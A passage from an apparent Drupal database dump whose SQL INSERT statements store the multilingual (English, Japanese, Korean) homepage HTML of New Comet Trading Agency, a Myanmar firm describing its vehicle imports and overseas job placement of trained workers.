xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 170, 'en', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p>Thank you for visiting our website, \"NEW COMET TRADING AGENCY\"! We are delighted to have you here. Please feel free to explore our website and learn more about the services and opportunities we offer. If you have any questions or need assistance, don\'t hesitate to reach out to us. We are here to help you on your journey towards achieving your goals.</p><h3>&nbsp;</h3><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 1, 170, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">当社は</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">年に設立し、登録</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"> ID (295/2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">ー</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">2005)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">.&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">100</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\">200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">現在、ニュ</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">ー</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">コメットトレンディグエイジェンシ</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">ー</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">では韓</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">国</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">の造船所で</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">働</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">きたいミャンマ</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">ー</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">全</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">国</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">から民族問わず、シンマライ</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">湾</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">岸で</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">経験</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">豊富な先生達の元で練習を重ねた</span><span style=\"font-family:&quot;MS Gothic&quot;;line-height:107%;mso-bidi-font-family:&quot;MS Gothic&quot;;mso-bidi-font-size:10.5pt;\">研</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-size:10.5pt;\">修をしていただき、仕事紹介をしております。</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">日本語能力試験</span>(JLPT, JFT, NAT-TEST,<span style=\"mso-spacerun:yes;\">&nbsp; </span>TOP-J)<span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 170, 'ko', 0, '<h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">사업을</span><span 